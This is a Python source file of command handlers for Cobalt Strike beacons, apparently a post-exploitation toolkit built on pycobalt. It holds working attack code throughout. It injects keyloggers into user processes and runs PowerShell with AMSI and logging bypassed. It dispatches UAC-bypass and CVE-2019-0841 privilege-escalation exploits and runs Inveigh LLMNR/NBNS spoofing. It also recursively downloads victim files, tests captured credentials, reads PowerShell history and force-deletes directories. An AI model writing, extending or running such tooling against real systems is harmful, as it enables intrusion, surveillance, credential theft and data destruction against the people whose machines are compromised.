def _(bid, code, *args):
    """Compile *code* with SharpGen and execute it in beacon *bid*.

    Any extra positional arguments are handed straight to ``sharpgen.execute``.
    A build/run failure (RuntimeError) is reported on the beacon console
    rather than propagated; the message points the operator at the script
    console for the details.
    """
    task = 'Tasked beacon to execute C# code: {}'.format(code)
    aggressor.btask(bid, task)
    try:
        sharpgen.execute(bid, code, *args)
    except RuntimeError:
        failure = 'SharpGen failed. See script console for more details'
        aggressor.berror(bid, failure)
def _(bid, *proc_names):
    """Start the beacon keylogger in the first matching, injectable process.

    *proc_names* are tried in the order given; with none supplied the
    module-level ``default_procs`` list is used. A process is only considered
    when the ps listing reports both an ``arch`` and a ``user`` for it. If no
    candidate exists an error is written to the beacon console.
    """
    targets = proc_names or default_procs

    def inject_first(procs):
        for wanted in targets:
            for proc in procs:
                injectable = 'arch' in proc and 'user' in proc
                if proc['name'] != wanted or not injectable:
                    continue
                aggressor.blog(bid, 'Keylogging process {} ({} {})'.format(
                    proc['name'], proc['pid'], proc['arch']))
                aggressor.bkeylogger(bid, proc['pid'], proc['arch'], silent=True)
                return
        aggressor.berror(bid, "Didn't find any processes to inject keylogger")

    # bps hands back the raw `ps` output; parse it and pick a target
    def on_ps(bid, content):
        inject_first(helpers.parse_ps(content))

    aggressor.btask(bid, 'Tasked beacon to keylog first accessible process named: ' + ', '.join(targets))
    aggressor.bps(bid, on_ps)
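def run(bid, program, args=None, silent=False):
    """Run a registered post-exploitation tool in beacon *bid*.

    *program* is looked up, in order, in the module-level ``assemblies``
    (.NET assemblies run with execute-assembly), ``powershell`` (scripts
    imported and then invoked with powerpick) and ``callbacks`` (python
    callables) tables. *args* is a list/tuple of arguments, or None/empty
    for no arguments. *silent* suppresses the task message on the assembly
    path and is forwarded to callbacks.

    Raises RuntimeError when *program* is not registered in any table.
    """
    if not args:
        args = []

    if program in assemblies:
        assembly = assemblies[program]
        # eaq quotes the argument list for the execute-assembly command line
        args = helpers.eaq(args)
        if not silent:
            aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args))
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)
        # Quote every argument individually so an operator-supplied value
        # containing spaces or quotes stays a single PowerShell token.
        if isinstance(args, (list, tuple)):
            args = ' '.join(powershell_quote(a) for a in args)
        # BUG FIX: the original applied ' '.join() a second time to the
        # already-joined string, which inserts a space between every
        # character of the command.
        aggressor.bpowerpick(bid, args)
    elif program in callbacks:
        callbacks[program](bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))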
def custom_powerpick(bid, command, silent=False, auto_host=True):
    """Run *command* as PowerShell inside an unmanaged runspace built with SharpGen.

    The generated C# joins its arguments with newlines and hands them to
    ``Execution.PowerShell.RunAsync`` with logging, AMSI and the execution
    policy bypassed, writing each result to stdout. A script previously
    imported with ``powershell-import`` is prepended via its host cradle.
    When *auto_host* is set and the final text exceeds ``max_script_size`` the
    script is hosted on the team server and replaced by a download cradle.
    *silent* only suppresses the task message.
    """
    # public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
    csharp = helpers.code_string(r"""
        string powershell = String.Join("\n", args);
        var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true);
        foreach (string result in results) {
            Console.Write(result);
        }
    """)

    if not silent:
        one_line = command.replace('\n', ' ')
        aggressor.btask(bid, 'Tasked beacon to run: {} (custom unmanaged)'.format(one_line))

    # anything the operator `powershell-import`ed is pulled in through its cradle
    cradle = aggressor.beacon_host_imported_script(bid)
    if cradle:
        command = '{}\n{}'.format(cradle, command)

    # oversized scripts are hosted and fetched rather than passed inline
    if auto_host and len(command) > max_script_size:
        command = aggressor.beacon_host_script(bid, command)

    # NOTE(review): the full command (cradle included) is echoed to the
    # script console even when silent=True; looks like leftover debugging.
    engine.message(command)

    refs = [
        'mscorlib.dll',
        'System.dll',
        'System.Core.dll',
        'System.Management.Automation.dll',
    ]
    # The leading '' element is preserved from the original; presumably
    # args[0] is consumed elsewhere -- TODO confirm against sharpgen.execute.
    sharpgen.execute(bid, csharp, [''] + command.split('\n'),
                     references=refs, resources=[], cache=sharpgen_cache)
def _(bid, exploit, *args):
    """Dispatch a privilege-escalation helper by name.

    *exploit* selects one of the ``elevate_*`` callables in the table below;
    *args* are forwarded after the beacon id. The argument count is checked
    against the callable's signature first so a mistyped invocation reports
    the expected signature instead of failing inside the helper.
    """
    exploits = {
        'token-shellcode': elevate_token_shellcode,
        'token-command': elevate_token_command,
        'slui-shellcode': elevate_slui_shellcode,
        'slui-command': elevate_slui_command,
        'fodhelper-shellcode': elevate_fodhelper_shellcode,
        'fodhelper-command': elevate_fodhelper_command,
        'eventvwr-command': elevate_eventvwr_command,
        'wscript-shellcode': elevate_wscript_shellcode,
        'wscript-command': elevate_wscript_command,
        'runas-shellcode': elevate_runas_shellcode,
        'cve-2019-0841': elevate_cve_2019_0841,
    }

    handler = exploits.get(exploit)
    if handler is None:
        aggressor.berror(bid, 'Exploit must be one of: {}'.format(', '.join(exploits.keys())))
        return

    aggressor.btask(bid, 'Tasked beacon to elevate with exploit: {}'.format(exploit))
    if not pycobalt.utils.check_args(handler, (bid,) + args):
        signature = pycobalt.utils.signature(handler, trim=1)
        aggressor.berror(bid, 'Invalid arguments to exploit {}. Signature: {}'.format(exploit, signature))
        return

    handler(bid, *args)
def _(bid):
    """Show the OS caption and installed hotfixes using wmic, via powerpick."""
    script = textwrap.dedent("""
    wmic os get Caption /value | more
    wmic qfe
    """)
    aggressor.btask(bid, 'Tasked beacon to get patch status')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """List the user's Desktop, Documents, Downloads and Favorites folders."""
    folders = ('Desktop', 'Documents', 'Downloads', 'Favorites')
    # one `ls` per folder, each on its own line
    script = ''.join('ls $env:userprofile\\{}\n'.format(name) for name in folders)
    aggressor.btask(bid, 'Tasked beacon to show common document folders')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """List the contents of %LOCALAPPDATA% and %APPDATA%."""
    script = textwrap.dedent("""
    ls $env:localappdata
    ls $env:appdata
    """)
    aggressor.btask(bid, 'Tasked beacon to show AppData')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """List processes that own a top-level window: pid, name and window title."""
    script = helpers.code_string(r"""
        Get-Process | Where { $_.mainWindowTitle } | Format-Table id,name,mainwindowtitle -AutoSize
    """)
    aggressor.btask(bid, 'Tasked beacon to list open windows')
    aggressor.bpowerpick(bid, script, silent=True)
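def _(bid, *hosts, exe='/share/tools/post_exploitation/TestAntivirus/bin/Release/net35/TestAntivirus.exe'):
    """Run TestAntivirus.exe through execute-assembly against *hosts* (local check when none).

    *exe* is the local path of the assembly to run. It defaults to the path
    that was previously hard-coded and is keyword-only, so existing callers
    passing hosts positionally are unaffected.
    """
    if hosts:
        aggressor.btask(bid, 'Tasked beacon to check AV on: ' + ', '.join(hosts))
    else:
        aggressor.btask(bid, 'Tasked beacon to check local AV')
    # eaq quotes the host list for the execute-assembly command line
    aggressor.bexecute_assembly(bid, exe, helpers.eaq(hosts), silent=True)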
def _(bid, *directories):
    """Recursively walk each of *directories* on the beacon and download every file found."""
    def fetch(path):
        aggressor.bdownload(bid, path)

    for directory in directories:
        msg = 'Tasked beacon to recurse {} for files to download'.format(directory)
        aggressor.btask(bid, msg)
        helpers.recurse_ls(bid, directory, fetch)
def _(bid):
    """Dump the beacon's environment variables, sorted by name."""
    script = textwrap.dedent(r"""
    Get-Childitem -path env:* | Select-Object Name, Value | Sort-Object name | Format-Table -Auto
    """)
    aggressor.btask(bid, 'Tasked beacon to get environmental variables')
    aggressor.bpowerpick(bid, script, silent=True)
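def _(bid):
    """List installed programs from the registry Uninstall keys.

    Both the native hive and the Wow6432Node (32-bit-on-64-bit) hive are
    queried; the original read only Wow6432Node and therefore missed every
    64-bit install. Missing keys are ignored so the command also works on
    hosts without a Wow6432Node hive.
    """
    command = textwrap.dedent(r"""
    Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*, HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* -ErrorAction SilentlyContinue | Select-Object DisplayName, InstallDate | Sort-Object -Property DisplayName | Format-Table -AutoSize
    """)
    aggressor.btask(bid, 'Tasked beacon to get list of uninstallers')
    aggressor.bpowerpick(bid, command, silent=True)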
def _(bid, code, *args):
    """Compile *code* with SharpGen (using the module-level build cache) and run it in beacon *bid*.

    Extra positional arguments are passed to the assembly. A cache hit is
    noted on the beacon console; a RuntimeError from SharpGen is reported
    there instead of propagated.
    """
    aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
    try:
        cached = sharpgen.execute(bid, code, args, cache=cache)
    except RuntimeError:
        aggressor.berror(bid, 'SharpGen failed. See Script Console for more details.')
        return
    if cached:
        aggressor.blog2(bid, 'Build was retrieved from the cache')
def _(bid, runtime=99999, *args):
    """Import Inveigh and start it (LLMNR/NBNS spoofing) via powerpick.

    Output files are written on the target under
    %userprofile%\\AppData\\Roaming\\Microsoft. *runtime* is passed as
    Inveigh's -RunTime value; any further positional *args* are appended
    verbatim to the Invoke-Inveigh line.
    """
    script = utils.basedir('powershell/Inveigh/Inveigh.ps1')
    aggressor.bpowershell_import(bid, script)
    aggressor.btask(bid, 'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft')
    invoke = (
        r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory $env:userprofile\AppData\Roaming\Microsoft "
        r"-RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
    ).format(runtime, ' '.join(args))
    aggressor.bpowerpick(bid, invoke)
def _(bid):
    """Show the OS caption and installed hotfixes (newest first) via WMI."""
    script = helpers.code_string(r"""
        wmic os get Caption /value
        Get-WmiObject -class Win32_quickfixengineering | Select-Object HotFixID,Description,InstalledBy,InstalledOn | Sort-Object InstalledOn -Descending | Format-Table -Auto
    """)
    aggressor.btask(bid, 'Tasked beacon to get patch info')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, home=None):
    """Remove Inveigh's output files from <home>\\AppData\\Roaming\\Microsoft.

    *home* defaults to the profile directory guessed for the beacon.
    """
    profile = home or helpers.guess_home(bid)
    directory = r'{}\AppData\Roaming\Microsoft'.format(profile)
    aggressor.btask(bid, 'Tasked beacon to remove inveigh files in {}'.format(directory))
    # NOTE(review): these leaf names look like abbreviations rather than the
    # file names Inveigh writes with -FileOutput; confirm they match the real
    # output names, otherwise the rm calls silently miss the files.
    for leaf in ('clear', 'log', 'v1', 'v2', 'form'):
        aggressor.brm(bid, r'{}\{}'.format(directory, leaf))
def _(bid):
    """Report whether the beacon's current token is in the local Administrators role."""
    script = helpers.code_string(r"""
        if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
            echo "User is a local admin!";
        } else {
            echo "User is not local admin :(";
        }
    """)
    aggressor.btask(bid, 'Tasked beacon to check if user is a local admin')
    aggressor.bpowerpick(bid, script, silent=True)
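def _(bid, fname, lines=10):
    """Print the first *lines* lines of *fname* on the beacon (a `head` equivalent).

    The line count is parsed on the C# side with Int32.Parse, so *lines* may
    arrive as a string from the beacon console.
    """
    code = helpers.code_string(r"""
        string file = args[0];
        int lines = Int32.Parse(args[1]);
        string text = string.Join("\r\n", System.IO.File.ReadLines(file).Take(lines));
        System.Console.WriteLine(text);
    """)
    # BUG FIX: btask was called without the beacon id as its first argument
    aggressor.btask(bid, 'Tasked beacon to get first {} lines of {}'.format(lines, fname))
    sharpgen.execute(bid, code, (fname, lines))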
def _(bid):
    """Report whether the host is domain-joined (and the user's domain if so)."""
    script = helpers.code_string(r"""
        If ((gwmi win32_computersystem).partofdomain){
            Write-Output "User is in domain: $env:userdomain"
        } Else {
            Write-Output "User is not in a domain"
        }
    """)
    aggressor.btask(bid, "Tasked beacon to check if it's in a domain")
    aggressor.bpowerpick(bid, script, silent=True)
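def _(bid, *dirs):
    """List the contents of every child directory (``*\\*``) of each of *dirs*; defaults to '.'."""
    targets = dirs or ['.']
    # Raw string: '\*' in an ordinary literal is an invalid escape sequence
    # (DeprecationWarning, slated to become an error). It happened to keep
    # the backslash, so the emitted glob is unchanged.
    globs = [powershell_quote(r'{}\*\*'.format(d)) for d in targets]
    command = 'ls ' + ', '.join(globs)
    aggressor.btask(bid, 'Tasked beacon to list */* in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, command, silent=True)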
def callback(procs):
    """Kill every process in *procs*; `proc_name` and `bid` come from the enclosing scope.

    Each kill is announced with the pid plus arch and user when the ps
    listing provides them. An empty listing is reported as an error.
    """
    if not procs:
        aggressor.berror(bid, 'No processes named {}'.format(proc_name))
        return
    for proc in procs:
        detail = 'Killing {}: {}'.format(proc_name, proc['pid'])
        # arch first, then user, each only when present
        for key in ('arch', 'user'):
            if key in proc:
                detail += ' ({})'.format(proc[key])
        aggressor.btask(bid, detail)
        aggressor.bkill(bid, proc['pid'], silent=True)
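def _(bid, last=50):
    """Show the last *last* entries of the PSReadline console history file.

    *last* is interpolated into the PowerShell pipeline, so it is validated
    as an integer first (it arrives as a string from the beacon console); a
    non-numeric value is reported instead of being pasted into the command.
    """
    try:
        count = int(last)
    except (TypeError, ValueError):
        aggressor.berror(bid, 'last must be an integer, got: {}'.format(last))
        return
    command = helpers.code_string(r"""
        $hist = (Get-Content "$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -EA 0 | Select -last {})
        if ($hist) {{
            $hist -Join "`r`n"
        }} else {{
            "No Powershell history found"
        }}
    """.format(count))
    aggressor.btask(bid, 'Tasked beacon to show {} items of powershell history'.format(count))
    aggressor.bpowerpick(bid, command, silent=True)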
def _(bid, *dirs):
    """Recursively force-delete each of *dirs* on the beacon (Remove-Item -Recurse -Force)."""
    if not dirs:
        aggressor.berror(bid, 'rmr: specify some directories to kill')
        return
    # one Remove-Item per directory, each path quoted for PowerShell
    lines = ['Remove-Item -Recurse -Force {}\n'.format(powershell_quote(d)) for d in dirs]
    aggressor.btask(bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, ''.join(lines), silent=True)
def _(bid, *dirs):
    """Recursively list the files under each of *dirs*; defaults to '.'."""
    targets = dirs or ['.']
    lines = ['Get-ChildItem -Recurse {}\n'.format(powershell_quote(d)) for d in targets]
    aggressor.btask(bid, 'Tasked beacon to recursively list files in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, ''.join(lines), silent=True)
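def _(bid, *hosts):
    """Resolve each of *hosts* with nslookup on the beacon; errors when none are given."""
    if not hosts:
        # BUG FIX: berror was called without the beacon id as its first argument
        aggressor.berror(bid, 'specify a host')
        return
    command = ''.join('nslookup {}\n'.format(powershell_quote(h)) for h in hosts)
    aggressor.btask(bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts)))
    aggressor.bpowerpick(bid, command, silent=True)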
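def _(bid, *users):
    """List the top level of C:\\Users\\<user> for each of *users*, or of every profile when none are given."""
    if users:
        aggressor.btask(bid, 'Tasked beacon to list files in user profiles for: {}'.format(', '.join(users)))
        for user in users:
            aggressor.bls(bid, r'C:\Users\{}'.format(user), silent=True)
    else:
        aggressor.btask(bid, 'Tasked beacon to list files in each user profile')
        # FIX: use .FullName -- depending on the PowerShell version a
        # DirectoryInfo stringifies to just its name, so `ls $_` would be
        # resolved relative to the beacon's working directory.
        aggressor.bpowerpick(bid, r'ls C:\Users | ForEach-Object { ls $_.FullName; }', silent=True)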
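def _(bid, username, password):
    """Test a username/password pair by binding a DirectoryEntry with it.

    A non-null ``psbase.name`` on the bound entry means the credentials were
    accepted. Both values are passed through ``powershell_quote`` (assumed, as
    elsewhere in this file, to yield a single PowerShell string token) so a
    password containing quotes, ``$`` or backticks can neither break the
    command nor be expanded by PowerShell; the original interpolated them raw
    into a double-quoted string. The pair is still recorded in the beacon log
    by the task message, as before.
    """
    command = helpers.code_string(r"""
        $u = {username}
        $p = {password}
        if ((new-object directoryservices.directoryentry "", $u, $p).psbase.name -ne $null) {{
            Write-Host "Credentials ${{u}}:${{p}} are valid :)"
        }} else {{
            Write-Host "Credentials ${{u}}:${{p}} are not valid :("
        }}
    """.format(username=powershell_quote(username), password=powershell_quote(password)))
    aggressor.btask(bid, 'Tasked beacon to test credentials {}:{}'.format(username, password))
    aggressor.bpowerpick(bid, command, silent=True)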
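def _(bid, *dirs):
    """Query the reparse point (link) data of every entry in each of *dirs*; defaults to '.'."""
    targets = dirs or ['.']
    # FIX: pass the full path to fsutil -- a DirectoryInfo/FileInfo may
    # stringify to just its name depending on the PowerShell version, which
    # fsutil then resolves against the beacon's working directory.
    lines = [
        'Get-ChildItem {} | % {{ fsutil reparsepoint query $_.FullName }}\n'.format(powershell_quote(d))
        for d in targets
    ]
    aggressor.btask(bid, 'Tasked beacon to list links in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, ''.join(lines), silent=True)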
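def _(bid, *args):
    """Run a 7-Zip command line using the binary uploaded by 7z-init.

    ``_uploaded`` is the module-level remote path set by 7z-init; the command
    is refused until it is set. *args* are joined with spaces and appended
    verbatim to the 7-Zip invocation (only read here, so no `global` needed).
    """
    if not _uploaded:
        # BUG FIX: berror was called without the beacon id as its first argument
        aggressor.berror(bid, 'Run 7z-init first')
        return
    line = ' '.join(args)
    aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(line))
    aggressor.bpowerpick(
        bid,
        "echo '7zip starting'; {} {} ; echo '7zip finished';".format(_uploaded, line),
        silent=True)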